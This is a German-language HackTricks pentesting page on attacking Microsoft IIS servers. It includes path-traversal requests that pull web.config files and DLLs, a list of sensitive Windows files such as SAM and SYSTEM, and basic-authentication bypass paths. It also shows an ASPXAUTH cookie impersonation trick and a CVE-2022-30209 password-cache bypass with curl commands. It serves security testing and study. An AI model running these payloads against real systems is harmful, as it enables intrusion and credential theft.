hacktricks/network-services-pentesting/pentesting-web/iis-internet-information-services.md

18 KiB
Raw Blame History

IIS - Internet Information Services

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

WhiteIntel

WhiteIntel ist eine von Dark Web angetriebene Suchmaschine, die kostenlose Funktionen bietet, um zu überprüfen, ob ein Unternehmen oder seine Kunden von Stealer-Malware kompromittiert wurden.

Das Hauptziel von WhiteIntel ist es, Kontoübernahmen und Ransomware-Angriffe aufgrund von informationsstehlender Malware zu bekämpfen.

Sie können ihre Website besuchen und ihren Motor kostenlos ausprobieren unter:

{% embed url="https://whiteintel.io" %}


Testausführbare Dateierweiterungen:

  • asp
  • aspx
  • config
  • php

Offenlegung der internen IP-Adresse

Auf jedem IIS-Server, bei dem Sie eine 302 erhalten, können Sie versuchen, den Host-Header zu entfernen und HTTP/1.0 zu verwenden. Im Antworttext könnte der Location-Header auf die interne IP-Adresse verweisen:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Antwort, die die interne IP-Adresse offenlegt:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Ausführen von .config-Dateien

Sie können .config-Dateien hochladen und verwenden, um Code auszuführen. Eine Möglichkeit besteht darin, den Code am Ende der Datei innerhalb eines HTML-Kommentars anzufügen: Beispiel hier herunterladen

Weitere Informationen und Techniken zur Ausnutzung dieser Schwachstelle finden Sie hier

IIS Discovery Bruteforce

Laden Sie die von mir erstellte Liste herunter:

{% file src="../../.gitbook/assets/iisfinal.txt" %}

Sie wurde erstellt, indem die Inhalte der folgenden Listen zusammengeführt wurden:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Verwenden Sie sie, ohne eine Erweiterung hinzuzufügen, die Dateien, die sie benötigen, haben sie bereits.

Pfadtraversierung

Offenlegung von Quellcode

Überprüfen Sie die vollständige Beschreibung unter: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

{% hint style="info" %} Zusammenfassend gibt es mehrere web.config-Dateien innerhalb der Anwendungsordner mit Verweisen auf "assemblyIdentity"-Dateien und "namespaces". Mit diesen Informationen ist es möglich zu wissen, wo sich ausführbare Dateien befinden und sie herunterzuladen.
Aus den heruntergeladenen Dlls ist es auch möglich, neue Namespaces zu finden, auf die Sie zugreifen und die web.config-Datei abrufen sollten, um neue Namespaces und assemblyIdentity zu finden.
Außerdem können die Dateien connectionstrings.config und global.asax interessante Informationen enthalten.\ {% endhint %}

In .Net MVC-Anwendungen spielt die web.config-Datei eine entscheidende Rolle, indem sie jede Binärdatei angibt, auf die die Anwendung durch "assemblyIdentity"-XML-Tags angewiesen ist.

Erkunden von Binärdateien

Ein Beispiel zum Zugriff auf die web.config-Datei wird unten gezeigt:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

Diese Anfrage zeigt verschiedene Einstellungen und Abhängigkeiten wie:

  • EntityFramework-Version
  • AppSettings für Webseiten, Clientvalidierung und JavaScript
  • Konfigurationen von System.web für Authentifizierung und Laufzeit
  • Einstellungen für System.webServer-Module
  • Assembly-Bindungen für die Laufzeit von zahlreichen Bibliotheken wie Microsoft.Owin, Newtonsoft.Json und System.Web.Mvc

Diese Einstellungen deuten darauf hin, dass bestimmte Dateien wie /bin/WebGrease.dll im /bin-Ordner der Anwendung zu finden sind.

Stammverzeichnisdateien

Dateien im Stammverzeichnis wie /global.asax und /connectionstrings.config (die sensible Passwörter enthalten) sind für die Konfiguration und den Betrieb der Anwendung unerlässlich.

Namespaces und Web.Config

MVC-Anwendungen definieren auch zusätzliche web.config-Dateien für spezifische Namespaces, um wiederholte Deklarationen in jeder Datei zu vermeiden, wie es bei einer Anfrage zum Herunterladen einer weiteren web.config demonstriert wird:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Herunterladen von DLLs

Die Erwähnung eines benutzerdefinierten Namespaces deutet auf eine DLL mit dem Namen "WebApplication1" im /bin-Verzeichnis hin. Anschließend wird eine Anfrage zum Herunterladen der WebApplication1.dll angezeigt:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

Dies deutet auf die Anwesenheit anderer wichtiger DLLs hin, wie System.Web.Mvc.dll und System.Web.Optimization.dll, im /bin-Verzeichnis.

In einem Szenario, in dem eine DLL einen Namespace namens WebApplication1.Areas.Minded importiert, könnte ein Angreifer auf die Existenz anderer web.config-Dateien in vorhersehbaren Pfaden schließen, wie z.B. /area-name/Views/, die spezifische Konfigurationen und Verweise auf andere DLLs im /bin-Ordner enthalten. Beispielsweise kann eine Anfrage an /Minded/Views/web.config Konfigurationen und Namespaces offenlegen, die auf die Anwesenheit einer anderen DLL, WebApplication1.AdditionalFeatures.dll, hinweisen.

Gemeinsame Dateien

Von hier

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Fehler

Wenn Sie einen Fehler wie den folgenden sehen:

Bedeutet dies, dass der Server den korrekten Domainnamen nicht im Host-Header erhalten hat.
Um auf die Webseite zuzugreifen, könnten Sie das SSL-Zertifikat überprüfen und möglicherweise den Domain-/Subdomain-Namen darin finden. Wenn er dort nicht vorhanden ist, müssen Sie möglicherweise VHosts brute force, bis Sie den richtigen finden.

Alte IIS-Schwachstellen, nach denen es sich lohnt zu suchen

Microsoft IIS Tilde-Zeichen "~" Schwachstelle/Feature Offenlegung kurzer Datei-/Ordnername

Sie können versuchen, Ordner und Dateien in jedem entdeckten Ordner aufzulisten (auch wenn dies eine Basisauthentifizierung erfordert) mit dieser Technik.
Die Hauptbeschränkung dieser Technik, wenn der Server anfällig ist, besteht darin, dass nur bis zu den ersten 6 Buchstaben des Namens jeder Datei/Ordner und den ersten 3 Buchstaben der Erweiterung der Dateien gefunden werden können.

Sie können https://github.com/irsdl/IIS-ShortName-Scanner verwenden, um diese Schwachstelle zu testen: java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Ursprüngliche Forschung: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Sie können auch Metasploit verwenden: use scanner/http/iis_shortname_scanner

Basisauthentifizierung umgehen

Umgehen Sie eine Basisauthentifizierung (IIS 7.5) und versuchen Sie auf Folgendes zuzugreifen: /admin:$i30:$INDEX_ALLOCATION/admin.php oder /admin::$INDEX_ALLOCATION/admin.php

Sie können versuchen, diese Schwachstelle und die letzte zu kombinieren, um neue Ordner zu finden und die Authentifizierung zu umgehen.

ASP.NET Trace.AXD aktiviertes Debugging

ASP.NET enthält einen Debugging-Modus und die Datei heißt trace.axd.

Es führt ein sehr detailliertes Protokoll aller Anfragen, die über einen bestimmten Zeitraum an eine Anwendung gestellt wurden.

Diese Informationen umfassen Remote-Client-IPs, Sitzungs-IDs, alle Anfrage- und Antwort-Cookies, physische Pfade, Quellcodeinformationen und möglicherweise sogar Benutzernamen und Passwörter.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

Screenshot 2021-03-30 um 13 19 11

ASPXAUTH verwendet die folgenden Informationen:

  • validationKey (Zeichenfolge): hex-codierter Schlüssel zur Verwendung für die Signaturvalidierung.
  • decryptionMethod (Zeichenfolge): (Standard "AES").
  • decryptionIV (Zeichenfolge): hex-codierter Initialisierungsvektor (standardmäßig ein Vektor aus Nullen).
  • decryptionKey (Zeichenfolge): hex-codierter Schlüssel zur Verwendung für die Entschlüsselung.

Einige Personen verwenden jedoch die Standardwerte dieser Parameter und verwenden als Cookie die E-Mail des Benutzers. Daher, wenn Sie eine Webseite finden, die die gleiche Plattform verwendet und den ASPXAUTH-Cookie verwendet und Sie einen Benutzer mit der E-Mail des Benutzers erstellen, den Sie auf dem angegriffenen Server imitieren möchten, könnten Sie in der Lage sein, den Cookie vom zweiten Server im ersten zu verwenden und den Benutzer zu imitieren.
Dieser Angriff funktionierte in diesem Bericht.

IIS-Authentifizierungsumgehung mit zwischengespeicherten Passwörtern (CVE-2022-30209)

Vollständiger Bericht hier: Ein Fehler im Code überprüfte das vom Benutzer angegebene Passwort nicht ordnungsgemäß, sodass ein Angreifer, dessen Passworthash auf einen Schlüssel trifft, der bereits im Cache vorhanden ist, sich als dieser Benutzer anmelden kann.

# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK

WhiteIntel

WhiteIntel ist eine von Dark Web betriebene Suchmaschine, die kostenlose Funktionen bietet, um zu überprüfen, ob ein Unternehmen oder seine Kunden von Stealer-Malware kompromittiert wurden.

Das Hauptziel von WhiteIntel ist es, Kontoübernahmen und Ransomware-Angriffe aufgrund von informationsstehlender Malware zu bekämpfen.

Sie können ihre Website besuchen und ihre Engine kostenlos ausprobieren unter:

{% embed url="https://whiteintel.io" %}

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: